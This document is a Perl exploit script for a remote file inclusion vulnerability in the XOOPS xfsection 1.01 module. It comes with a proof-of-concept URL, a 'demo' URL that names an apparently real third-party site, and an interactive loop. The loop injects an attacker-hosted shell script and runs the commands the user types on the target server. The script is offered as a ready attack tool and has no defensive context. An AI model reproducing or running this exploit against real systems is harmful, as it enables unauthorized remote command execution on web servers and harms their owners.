xoops101-rfi.txt

`#!/usr/bin/perl   
  
sub header()  
{ print q {   
  
=========================================================================  
XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit   
Exploit Coded by fl0 fl0w  
flo_flow_supremacy[at]yahoo[dot]com  
PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell?  
Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL?   
=========================================================================  
}   
}  
sub routine()  
{ header();  
print q {   
======================================================================================================   
USAGE: perl exploit.pl <http://site.com/modules/xfsection/modify.php?dir_module=shell?&cmdvar=command>  
EXAMPLE: perl [localhost\][path] exploit.pl http://site.com/  
======================================================================================================   
};  
exit();  
}  
use LWP::UserAgent;  
$site=@ARGV[0];  
  
$shells=@ARGV[1];  
$shellcmd=@ARGV[2];  
  
if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)   
  
{ routine()  
}  
  
header();  
  
while() { print"[shell] \$";   
while(<STDIN>)  
{ $cmd=$_;  
  
chomp($cmd);  
$sploit=LWP::UserAgent->new() or die;  
$requesting=HTTP::Request->new(GET=>$site.'/modules/xfsection/modify.php?dir_module='.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";  
$re=$sploit->request(requesting);   
  
$i=$re->content;  
$i=~tr/[\n]/[ê]/;  
if(!$cmd) { print "Enter a command\n\n";  
$i="";   
}   
elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ )  
{ print "\nCould NOT connect to cmd from host \n";  
exit;  
}   
elsif($i=~/^<br.\/>.<b>WARNING/) {   
print "\nInvalid command\n\n";  
};  
if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/)  
{ $last=$1;  
$last=~tr/[&234;]/[\n]/;  
print "\n$last\n";  
last;  
}  
  
  
else {  
print "[shell] \$";  
}   
}   
}   
last;  
  
  
  
  
  
`